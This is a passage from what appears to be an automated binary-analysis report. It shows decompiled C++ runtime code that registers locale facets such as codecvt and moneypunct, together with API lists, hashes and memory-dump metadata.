																																																										 *(_t990 - 0x10) = _t939;
																																																										 *(_t990 - 4) = 1;
																																																										E6D486FD3(__eflags, _t939);
																																																										 *0x6d4ea26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t939 + 4))))();
																																																										 *0x6d546de0 = _t939;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t939 = _t962;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t938 =  *(_t990 - 0x10);
																																																							 *(_t990 - 0x10) = _t938;
																																																							 *(_t990 - 4) = 1;
																																																							E6D486FD3(__eflags, _t938);
																																																							 *0x6d4ea26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t938 + 4))))();
																																																							 *0x6d546ddc = _t938;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t938 = _t961;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t937 =  *(_t990 - 0x10);
																																																				 *(_t990 - 0x10) = _t937;
																																																				 *(_t990 - 4) = 1;
																																																				E6D486FD3(__eflags, _t937);
																																																				 *0x6d4ea26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t937 + 4))))();
																																																				 *0x6d546db0 = _t937;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t937 = _t960;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t936 =  *(_t990 - 0x10);
																																																	 *(_t990 - 0x10) = _t936;
																																																	 *(_t990 - 4) = 1;
																																																	E6D486FD3(__eflags, _t936);
																																																	 *0x6d4ea26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t936 + 4))))();
																																																	 *0x6d546dd8 = _t936;
																																																	goto L103;
																																																}
																																															} else {
																																																_t936 = _t959;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t935 =  *(_t990 - 0x10);
																																														 *(_t990 - 0x10) = _t935;
																																														 *(_t990 - 4) = 1;
																																														E6D486FD3(__eflags, _t935);
																																														 *0x6d4ea26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t935 + 4))))();
																																														 *0x6d546dc4 = _t935;
																																														goto L96;
																																													}
																																												} else {
																																													_t935 = _t958;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t934 =  *(_t990 - 0x10);
																																											 *(_t990 - 0x10) = _t934;
																																											 *(_t990 - 4) = 1;
																																											E6D486FD3(__eflags, _t934);
																																											 *0x6d4ea26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t934 + 4))))();
																																											 *0x6d546dc8 = _t934;
																																											goto L89;
																																										}
																																									} else {
																																										_t934 = _t957;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t933 =  *(_t990 - 0x10);
																																								 *(_t990 - 0x10) = _t933;
																																								 *(_t990 - 4) = 1;
																																								E6D486FD3(__eflags, _t933);
																																								 *0x6d4ea26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t933 + 4))))();
																																								 *0x6d546df4 = _t933;
																																								goto L82;
																																							}
																																						} else {
																																							_t933 = _t956;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t932 =  *(_t990 - 0x10);
																																					 *(_t990 - 0x10) = _t932;
																																					 *(_t990 - 4) = 1;
																																					E6D486FD3(__eflags, _t932);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t932 + 4))))();
																																					 *0x6d546df8 = _t932;
																																					goto L75;
																																				}
																																			} else {
																																				_t932 = _t955;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t931 =  *(_t990 - 0x10);
																																		 *(_t990 - 0x10) = _t931;
																																		 *(_t990 - 4) = 1;
																																		E6D486FD3(__eflags, _t931);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t931 + 4))))();
																																		 *0x6d546dc0 = _t931;
																																		goto L68;
																																	}
																																} else {
																																	_t931 = _t954;
																																	goto L68;
																																}
																															}
																														} else {
																															_t930 =  *(_t990 - 0x10);
																															 *(_t990 - 0x10) = _t930;
																															 *(_t990 - 4) = 1;
																															E6D486FD3(__eflags, _t930);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t930 + 4))))();
																															 *0x6d546df0 = _t930;
																															goto L61;
																														}
																													} else {
																														_t930 = _t953;
																														goto L61;
																													}
																												}
																											} else {
																												_t929 =  *(_t990 - 0x10);
																												 *(_t990 - 0x10) = _t929;
																												 *(_t990 - 4) = 1;
																												E6D486FD3(__eflags, _t929);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t929 + 4))))();
																												 *0x6d546dbc = _t929;
																												goto L54;
																											}
																										} else {
																											_t929 = _t952;
																											goto L54;
																										}
																									}
																								} else {
																									_t928 =  *(_t990 - 0x10);
																									 *(_t990 - 0x10) = _t928;
																									 *(_t990 - 4) = 1;
																									E6D486FD3(__eflags, _t928);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t928 + 4))))();
																									 *0x6d546dec = _t928;
																									goto L47;
																								}
																							} else {
																								_t928 = _t951;
																								goto L47;
																							}
																						}
																					} else {
																						_t927 =  *(_t990 - 0x10);
																						 *(_t990 - 0x10) = _t927;
																						 *(_t990 - 4) = 1;
																						E6D486FD3(__eflags, _t927);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t927 + 4))))();
																						 *0x6d546db8 = _t927;
																						goto L40;
																					}
																				} else {
																					_t927 = _t950;
																					goto L40;
																				}
																			}
																		} else {
																			_t926 =  *(_t990 - 0x10);
																			 *(_t990 - 0x10) = _t926;
																			 *(_t990 - 4) = 1;
																			E6D486FD3(__eflags, _t926);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t926 + 4))))();
																			 *0x6d546de8 = _t926;
																			goto L33;
																		}
																	} else {
																		_t926 = _t949;
																		goto L33;
																	}
																}
															} else {
																_t925 =  *(_t990 - 0x10);
																 *(_t990 - 0x10) = _t925;
																 *(_t990 - 4) = 1;
																E6D486FD3(__eflags, _t925);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t925 + 4))))();
																 *0x6d546dd4 = _t925;
																goto L26;
															}
														} else {
															_t925 = _t948;
															goto L26;
														}
													}
												} else {
													_t924 =  *(_t990 - 0x10);
													 *(_t990 - 0x10) = _t924;
													 *(_t990 - 4) = 1;
													E6D486FD3(__eflags, _t924);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t924 + 4))))();
													 *0x6d546db4 = _t924;
													goto L19;
												}
											} else {
												_t924 = _t947;
												goto L19;
											}
										}
									} else {
										_t923 =  *(_t990 - 0x10);
										 *(_t990 - 0x10) = _t923;
										 *(_t990 - 4) = 1;
										E6D486FD3(__eflags, _t923);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t923 + 4))))();
										 *0x6d546de4 = _t923;
										goto L12;
									}
								} else {
									_t923 = _t946;
									goto L12;
								}
							}
						} else {
							_t922 =  *(_t990 - 0x10);
							 *(_t990 - 0x10) = _t922;
							 *(_t990 - 4) = 1;
							E6D486FD3(__eflags, _t922);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t922 + 4))))();
							 *0x6d546e04 = _t922;
							goto L5;
						}
					} else {
						_t922 = _t945;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48EEF2
std::_Lockit::_Lockit.LIBCPMT ref: 6D48EEFC
int.LIBCPMT ref: 6D48EF13

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

codecvt.LIBCPMT ref: 6D48EF36
std::_Facet_Register.LIBCPMT ref: 6D48EF4D
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48EF6D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48EF8B

Strings

0kTm, xrefs: 6D48EF07

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: 0kTm
API String ID: 2594415655-2017035977
Opcode ID: b479595bd64451414fc5f5eff7f65acf8fa3875b19a8811c15f31756a6e00f23
Instruction ID: 5edb5cddff7e3147791719e4d4a68837ad2a3d9fc495d5af9764bec856da8efe
Opcode Fuzzy Hash: b479595bd64451414fc5f5eff7f65acf8fa3875b19a8811c15f31756a6e00f23
Instruction Fuzzy Hash: A311C175808665DBCF04EB60C840FEEB7B5AF54314F1A401CE611B7292CB71DD018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F759, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D48F759(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t139;
				signed int _t140;
				void* _t152;
				void* _t165;
				void* _t178;
				void* _t191;
				void* _t204;
				void* _t217;
				void* _t230;
				void* _t243;
				signed int _t359;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t418;

				_t387 = __edx;
				_t296 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t418 - 0x14, 0);
				_t399 =  *0x6d546dc4; // 0x0
				 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
				 *(_t418 - 0x10) = _t399;
				_t139 = E6D46161C(0x6d546d78);
				_t299 =  *((intOrPtr*)(_t418 + 8));
				_t140 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t139);
				_t389 = _t140;
				if(_t140 != 0) {
					L5:
					E6D4866BA(_t418 - 0x14);
					return E6D4A0075(_t389);
				} else {
					if(_t399 == 0) {
						_push( *((intOrPtr*)(_t418 + 8)));
						_push(_t418 - 0x10);
						__eflags = E6D4912B4(__ebx, _t299, __edx, _t389, _t399) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t418 - 0x20);
							E6D4A3D74(_t418 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t389, _t399, 0x14);
							E6D486653(_t418 - 0x14, 0);
							_t400 =  *0x6d546dd8; // 0x0
							 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
							 *(_t418 - 0x10) = _t400;
							_t152 = E6D46161C(0x6d546d84);
							_t306 =  *((intOrPtr*)(_t418 + 8));
							_t390 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t152);
							__eflags = _t390;
							if(_t390 != 0) {
								L12:
								E6D4866BA(_t418 - 0x14);
								return E6D4A0075(_t390);
							} else {
								__eflags = _t400;
								if(_t400 == 0) {
									_push( *((intOrPtr*)(_t418 + 8)));
									_push(_t418 - 0x10);
									__eflags = E6D491339(_t296, _t306, __edx, _t390, _t400) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t418 - 0x20);
										E6D4A3D74(_t418 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t296, _t390, _t400, 0x14);
										E6D486653(_t418 - 0x14, 0);
										_t401 =  *0x6d546db0; // 0x0
										 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
										 *(_t418 - 0x10) = _t401;
										_t165 = E6D46161C(0x6d546d64);
										_t313 =  *((intOrPtr*)(_t418 + 8));
										_t391 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t165);
										__eflags = _t391;
										if(_t391 != 0) {
											L19:
											E6D4866BA(_t418 - 0x14);
											return E6D4A0075(_t391);
										} else {
											__eflags = _t401;
											if(_t401 == 0) {
												_push( *((intOrPtr*)(_t418 + 8)));
												_push(_t418 - 0x10);
												__eflags = E6D4913A1(_t296, _t313, __edx, _t391, _t401) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t418 - 0x20);
													E6D4A3D74(_t418 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t296, _t391, _t401, 0x14);
													E6D486653(_t418 - 0x14, 0);
													_t402 =  *0x6d546ddc; // 0x0
													 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
													 *(_t418 - 0x10) = _t402;
													_t178 = E6D46161C(0x6d546d88);
													_t320 =  *((intOrPtr*)(_t418 + 8));
													_t392 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t178);
													__eflags = _t392;
													if(_t392 != 0) {
														L26:
														E6D4866BA(_t418 - 0x14);
														return E6D4A0075(_t392);
													} else {
														__eflags = _t402;
														if(_t402 == 0) {
															_push( *((intOrPtr*)(_t418 + 8)));
															_push(_t418 - 0x10);
															__eflags = E6D491409(_t296, _t320, _t387, _t392, _t402) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t418 - 0x20);
																E6D4A3D74(_t418 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t296, _t392, _t402, 0x14);
																E6D486653(_t418 - 0x14, 0);
																_t403 =  *0x6d546de0; // 0x0
																 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																 *(_t418 - 0x10) = _t403;
																_t191 = E6D46161C(0x6d546d8c);
																_t327 =  *((intOrPtr*)(_t418 + 8));
																_t393 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t191);
																__eflags = _t393;
																if(_t393 != 0) {
																	L33:
																	E6D4866BA(_t418 - 0x14);
																	return E6D4A0075(_t393);
																} else {
																	__eflags = _t403;
																	if(_t403 == 0) {
																		_push( *((intOrPtr*)(_t418 + 8)));
																		_push(_t418 - 0x10);
																		__eflags = E6D491471(_t296, _t327, _t387, _t393, _t403) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t418 - 0x20);
																			E6D4A3D74(_t418 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t296, _t393, _t403, 0x14);
																			E6D486653(_t418 - 0x14, 0);
																			_t404 =  *0x6d546dfc; // 0x0
																			 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																			 *(_t418 - 0x10) = _t404;
																			_t204 = E6D46161C(0x6d546da8);
																			_t334 =  *((intOrPtr*)(_t418 + 8));
																			_t394 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t204);
																			__eflags = _t394;
																			if(_t394 != 0) {
																				L40:
																				E6D4866BA(_t418 - 0x14);
																				return E6D4A0075(_t394);
																			} else {
																				__eflags = _t404;
																				if(_t404 == 0) {
																					_push( *((intOrPtr*)(_t418 + 8)));
																					_push(_t418 - 0x10);
																					__eflags = E6D4914EC(_t296, _t334, _t387, _t394, _t404) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t418 - 0x20);
																						E6D4A3D74(_t418 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t296, _t394, _t404, 0x14);
																						E6D486653(_t418 - 0x14, 0);
																						_t405 =  *0x6d546dcc; // 0x0
																						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																						 *(_t418 - 0x10) = _t405;
																						_t217 = E6D46161C(0x6d546d80);
																						_t341 =  *((intOrPtr*)(_t418 + 8));
																						_t395 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t217);
																						__eflags = _t395;
																						if(_t395 != 0) {
																							L47:
																							E6D4866BA(_t418 - 0x14);
																							return E6D4A0075(_t395);
																						} else {
																							__eflags = _t405;
																							if(_t405 == 0) {
																								_push( *((intOrPtr*)(_t418 + 8)));
																								_push(_t418 - 0x10);
																								__eflags = E6D491558(_t296, _t341, _t387, _t395, _t405) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t418 - 0x20);
																									E6D4A3D74(_t418 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t296, _t395, _t405, 0x14);
																									E6D486653(_t418 - 0x14, 0);
																									_t406 =  *0x6d546e00; // 0x0
																									 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																									 *(_t418 - 0x10) = _t406;
																									_t230 = E6D46161C(0x6d546dac);
																									_t348 =  *((intOrPtr*)(_t418 + 8));
																									_t396 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t230);
																									__eflags = _t396;
																									if(_t396 != 0) {
																										L54:
																										E6D4866BA(_t418 - 0x14);
																										return E6D4A0075(_t396);
																									} else {
																										__eflags = _t406;
																										if(_t406 == 0) {
																											_push( *((intOrPtr*)(_t418 + 8)));
																											_push(_t418 - 0x10);
																											__eflags = E6D4915C4(_t296, _t348, _t387, _t396, _t406) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t418 - 0x20);
																												E6D4A3D74(_t418 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t296, _t396, _t406, 0x14);
																												E6D486653(_t418 - 0x14, 0);
																												_t407 =  *0x6d546dd0; // 0x0
																												 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																												 *(_t418 - 0x10) = _t407;
																												_t243 = E6D46161C(0x6d546d60);
																												_t355 =  *((intOrPtr*)(_t418 + 8));
																												_t397 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t243);
																												__eflags = _t397;
																												if(_t397 != 0) {
																													L61:
																													E6D4866BA(_t418 - 0x14);
																													return E6D4A0075(_t397);
																												} else {
																													__eflags = _t407;
																													if(_t407 == 0) {
																														_push( *((intOrPtr*)(_t418 + 8)));
																														_push(_t418 - 0x10);
																														__eflags = E6D49162A(_t296, _t355, _t387, _t397, _t407) - 0xffffffff;
																														if(__eflags == 0) {
																															_t359 = _t418 - 0x20;
																															E6D461438(_t359);
																															E6D4A3D74(_t418 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e851f, _t296, _t397, _t407, 4);
																															_t408 = _t359;
																															 *(_t418 - 0x10) = _t408;
																															 *((intOrPtr*)(_t408 + 4)) =  *((intOrPtr*)(_t418 + 0xc));
																															_push( *((intOrPtr*)(_t418 + 0x14)));
																															_t133 = _t418 - 4;
																															 *_t133 =  *(_t418 - 4) & 0x00000000;
																															__eflags =  *_t133;
																															 *_t408 = 0x6d4ec0c4;
																															 *((char*)(_t408 + 0x28)) =  *((intOrPtr*)(_t418 + 0x10));
																															E6D49542F(_t296, _t359, _t387, _t397, _t408,  *_t133);
																															return E6D4A0075(_t408,  *((intOrPtr*)(_t418 + 8)));
																														} else {
																															_t397 =  *(_t418 - 0x10);
																															 *(_t418 - 0x10) = _t397;
																															 *(_t418 - 4) = 1;
																															E6D486FD3(__eflags, _t397);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 4))))();
																															 *0x6d546dd0 = _t397;
																															goto L61;
																														}
																													} else {
																														_t397 = _t407;
																														goto L61;
																													}
																												}
																											} else {
																												_t396 =  *(_t418 - 0x10);
																												 *(_t418 - 0x10) = _t396;
																												 *(_t418 - 4) = 1;
																												E6D486FD3(__eflags, _t396);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t396 + 4))))();
																												 *0x6d546e00 = _t396;
																												goto L54;
																											}
																										} else {
																											_t396 = _t406;
																											goto L54;
																										}
																									}
																								} else {
																									_t395 =  *(_t418 - 0x10);
																									 *(_t418 - 0x10) = _t395;
																									 *(_t418 - 4) = 1;
																									E6D486FD3(__eflags, _t395);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t395 + 4))))();
																									 *0x6d546dcc = _t395;
																									goto L47;
																								}
																							} else {
																								_t395 = _t405;
																								goto L47;
																							}
																						}
																					} else {
																						_t394 =  *(_t418 - 0x10);
																						 *(_t418 - 0x10) = _t394;
																						 *(_t418 - 4) = 1;
																						E6D486FD3(__eflags, _t394);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t394 + 4))))();
																						 *0x6d546dfc = _t394;
																						goto L40;
																					}
																				} else {
																					_t394 = _t404;
																					goto L40;
																				}
																			}
																		} else {
																			_t393 =  *(_t418 - 0x10);
																			 *(_t418 - 0x10) = _t393;
																			 *(_t418 - 4) = 1;
																			E6D486FD3(__eflags, _t393);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t393 + 4))))();
																			 *0x6d546de0 = _t393;
																			goto L33;
																		}
																	} else {
																		_t393 = _t403;
																		goto L33;
																	}
																}
															} else {
																_t392 =  *(_t418 - 0x10);
																 *(_t418 - 0x10) = _t392;
																 *(_t418 - 4) = 1;
																E6D486FD3(__eflags, _t392);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t392 + 4))))();
																 *0x6d546ddc = _t392;
																goto L26;
															}
														} else {
															_t392 = _t402;
															goto L26;
														}
													}
												} else {
													_t391 =  *(_t418 - 0x10);
													 *(_t418 - 0x10) = _t391;
													 *(_t418 - 4) = 1;
													E6D486FD3(__eflags, _t391);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t391 + 4))))();
													 *0x6d546db0 = _t391;
													goto L19;
												}
											} else {
												_t391 = _t401;
												goto L19;
											}
										}
									} else {
										_t390 =  *(_t418 - 0x10);
										 *(_t418 - 0x10) = _t390;
										 *(_t418 - 4) = 1;
										E6D486FD3(__eflags, _t390);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t390 + 4))))();
										 *0x6d546dd8 = _t390;
										goto L12;
									}
								} else {
									_t390 = _t400;
									goto L12;
								}
							}
						} else {
							_t389 =  *(_t418 - 0x10);
							 *(_t418 - 0x10) = _t389;
							 *(_t418 - 4) = 1;
							E6D486FD3(__eflags, _t389);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t389 + 4))))();
							 *0x6d546dc4 = _t389;
							goto L5;
						}
					} else {
						_t389 = _t399;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48F760
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F76A
int.LIBCPMT ref: 6D48F781

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

moneypunct.LIBCPMT ref: 6D48F7A4
std::_Facet_Register.LIBCPMT ref: 6D48F7BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F7DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F7F9

Strings

xmTm, xrefs: 6D48F775

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: xmTm
API String ID: 113178234-571771561
Opcode ID: 723be85203ae7b2f892084fae89cc5c637fa9187775a39918d531229153e8307
Instruction ID: 0c804fb18dc05350519083b91c182b2725b0bb236b78fded338bd736d0a4dcad
Opcode Fuzzy Hash: 723be85203ae7b2f892084fae89cc5c637fa9187775a39918d531229153e8307
Instruction Fuzzy Hash: F611BC758082199BDF01EBA0C844EEDB7B4AF90314F2A400DD611AB395CB74DD00CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F6B3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D48F6B3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t153;
				signed int _t154;
				void* _t166;
				void* _t179;
				void* _t192;
				void* _t205;
				void* _t218;
				void* _t231;
				void* _t244;
				void* _t257;
				void* _t270;
				signed int _t397;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				void* _t462;

				_t428 = __edx;
				_t327 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t462 - 0x14, 0);
				_t441 =  *0x6d546dc8; // 0x0
				 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
				 *(_t462 - 0x10) = _t441;
				_t153 = E6D46161C(0x6d546d7c);
				_t330 =  *((intOrPtr*)(_t462 + 8));
				_t154 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t153);
				_t430 = _t154;
				if(_t154 != 0) {
					L5:
					E6D4866BA(_t462 - 0x14);
					return E6D4A0075(_t430);
				} else {
					if(_t441 == 0) {
						_push( *((intOrPtr*)(_t462 + 8)));
						_push(_t462 - 0x10);
						__eflags = E6D491230(__ebx, _t330, __edx, _t430, _t441) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t462 - 0x20);
							E6D4A3D74(_t462 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t430, _t441, 0x14);
							E6D486653(_t462 - 0x14, 0);
							_t442 =  *0x6d546dc4; // 0x0
							 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
							 *(_t462 - 0x10) = _t442;
							_t166 = E6D46161C(0x6d546d78);
							_t337 =  *((intOrPtr*)(_t462 + 8));
							_t431 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t166);
							__eflags = _t431;
							if(_t431 != 0) {
								L12:
								E6D4866BA(_t462 - 0x14);
								return E6D4A0075(_t431);
							} else {
								__eflags = _t442;
								if(_t442 == 0) {
									_push( *((intOrPtr*)(_t462 + 8)));
									_push(_t462 - 0x10);
									__eflags = E6D4912B4(_t327, _t337, __edx, _t431, _t442) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t462 - 0x20);
										E6D4A3D74(_t462 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t327, _t431, _t442, 0x14);
										E6D486653(_t462 - 0x14, 0);
										_t443 =  *0x6d546dd8; // 0x0
										 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
										 *(_t462 - 0x10) = _t443;
										_t179 = E6D46161C(0x6d546d84);
										_t344 =  *((intOrPtr*)(_t462 + 8));
										_t432 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t179);
										__eflags = _t432;
										if(_t432 != 0) {
											L19:
											E6D4866BA(_t462 - 0x14);
											return E6D4A0075(_t432);
										} else {
											__eflags = _t443;
											if(_t443 == 0) {
												_push( *((intOrPtr*)(_t462 + 8)));
												_push(_t462 - 0x10);
												__eflags = E6D491339(_t327, _t344, __edx, _t432, _t443) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t462 - 0x20);
													E6D4A3D74(_t462 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t327, _t432, _t443, 0x14);
													E6D486653(_t462 - 0x14, 0);
													_t444 =  *0x6d546db0; // 0x0
													 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
													 *(_t462 - 0x10) = _t444;
													_t192 = E6D46161C(0x6d546d64);
													_t351 =  *((intOrPtr*)(_t462 + 8));
													_t433 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t192);
													__eflags = _t433;
													if(_t433 != 0) {
														L26:
														E6D4866BA(_t462 - 0x14);
														return E6D4A0075(_t433);
													} else {
														__eflags = _t444;
														if(_t444 == 0) {
															_push( *((intOrPtr*)(_t462 + 8)));
															_push(_t462 - 0x10);
															__eflags = E6D4913A1(_t327, _t351, _t428, _t433, _t444) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t462 - 0x20);
																E6D4A3D74(_t462 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t327, _t433, _t444, 0x14);
																E6D486653(_t462 - 0x14, 0);
																_t445 =  *0x6d546ddc; // 0x0
																 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																 *(_t462 - 0x10) = _t445;
																_t205 = E6D46161C(0x6d546d88);
																_t358 =  *((intOrPtr*)(_t462 + 8));
																_t434 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t205);
																__eflags = _t434;
																if(_t434 != 0) {
																	L33:
																	E6D4866BA(_t462 - 0x14);
																	return E6D4A0075(_t434);
																} else {
																	__eflags = _t445;
																	if(_t445 == 0) {
																		_push( *((intOrPtr*)(_t462 + 8)));
																		_push(_t462 - 0x10);
